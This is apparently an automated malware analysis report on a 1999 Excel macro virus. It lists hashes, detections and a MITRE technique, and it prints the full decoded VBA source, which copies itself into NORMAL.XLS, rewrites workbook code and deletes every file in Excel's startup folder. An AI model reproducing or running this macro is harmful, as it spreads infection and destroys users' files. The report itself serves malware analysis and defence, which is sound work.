Office (OLE) malware analysis — malicious · 6f4ec3c0e2865b66

MALICIOUS

Office (OLE)

29.0 KB Created: 1998-11-06 09:07:16 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 144b9b616d1a5c12bfefd1931d55cb02 SHA-1: ef3044fd95eb2383ff62835a2209e95ed676c7d2 SHA-256: 6f4ec3c0e2865b667c3451c00ade3f2cc4761de6fffb7c5cf780978a0fac55aa

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The critical ClamAV detection and the presence of VBA macros indicate malicious intent. The VBA macro code attempts to infect other Excel files by copying itself into the NORMAL.XLS startup template and then deleting other files in the startup path. This behavior suggests a macro-based worm or downloader.

Heuristics 2

ClamAV: Xls.Trojan.Obvious-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Obvious-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2227 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2227 bytes
SHA-256: `85ae0029c0b1e7a1b8c9e31c9474f9f48503be4966ea795589cca31819185cdd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'EcHa original viruses code 'This code written by Reza Pc 212 v1.0 'for all stupid jerk - all my baby cool '15 November 1999 Private Sub Infected() Dim NT, ID, CM As String Dim AW, TW, OBJ As Object On Error Resume Next Let ID = "'15 November 1999" Let NT = "NORMAL.XLS" Let CM = "ThisWorkbook" Set AW = ActiveWorkbook.VBProject.VBComponents(CM).CodeModule Set TW = ThisWorkbook.VBProject.VBComponents(CM).CodeModule If Dir(Application.StartupPath + "\" + NT) <> NT Then ThisWorkbook.SaveAs FileName:=Application.StartupPath + "\" + NT, _ FileFormat:=xlNormal, AddToMru:=False End If If TW.Lines(4, 1) <> ID Then TW.DeleteLines 1, TW.CountOfLines TW.InsertLines 1, AW.Lines(1, AW.CountOfLines) End If If AW.Lines(4, 1) <> ID Then AW.DeleteLines 1, AW.CountOfLines AW.InsertLines 1, TW.Lines(1, TW.CountOfLines) End If Kill Application.StartupPath + "\." End Sub Private Sub Workbook_Deactivate() Infected End Sub Private Sub Workbook_Activate() Infected End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 85ae0029c0b1e7a1b8c9e31c9474f9f48503be4966ea795589cca31819185cdd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'EcHa original viruses code
'This code written by Reza Pc 212 v1.0
'for all stupid jerk - all my baby cool
'15 November 1999

Private Sub Infected()
    Dim NT, ID, CM As String
    Dim AW, TW, OBJ As Object
    On Error Resume Next
    Let ID = "'15 November 1999"
    Let NT = "NORMAL.XLS"
    Let CM = "ThisWorkbook"
    Set AW = ActiveWorkbook.VBProject.VBComponents(CM).CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents(CM).CodeModule
    If Dir(Application.StartupPath + "\" + NT) <> NT Then
        ThisWorkbook.SaveAs FileName:=Application.StartupPath + "\" + NT, _
                            FileFormat:=xlNormal, AddToMru:=False
    End If
    If TW.Lines(4, 1) <> ID Then
        TW.DeleteLines 1, TW.CountOfLines
        TW.InsertLines 1, AW.Lines(1, AW.CountOfLines)
    End If
    If AW.Lines(4, 1) <> ID Then
        AW.DeleteLines 1, AW.CountOfLines
        AW.InsertLines 1, TW.Lines(1, TW.CountOfLines)
    End If
    Kill Application.StartupPath + "\*.*"
End Sub
Private Sub Workbook_Deactivate()
    Infected
End Sub
Private Sub Workbook_Activate()
    Infected
End Sub



















Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.